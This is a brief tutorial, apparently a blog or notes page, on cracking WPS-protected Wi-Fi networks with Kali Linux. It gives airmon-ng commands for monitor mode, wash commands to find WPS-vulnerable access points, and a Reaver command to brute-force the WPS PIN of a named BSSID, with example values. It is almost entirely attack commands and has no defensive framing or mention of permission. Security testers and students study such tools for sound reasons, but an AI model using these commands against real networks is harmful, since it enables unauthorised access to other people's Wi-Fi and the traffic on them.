Hack WPS Wi-Fi With Kali Linux & Reaver

Finding a Network :

airmon-ng start [network interface name]
airmon-ng start wlan0

show networks that are vulnerable to the WPS brute force attack Reaver uses :

wash -i [monitor interface name]
wash -i mon0

Launching Reaver :

reaver -i mon0 -c [channel number] -b [bssid] -vv
reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv

References :
https://www.pwnieexpress.com/wps-cracking-with-reaver/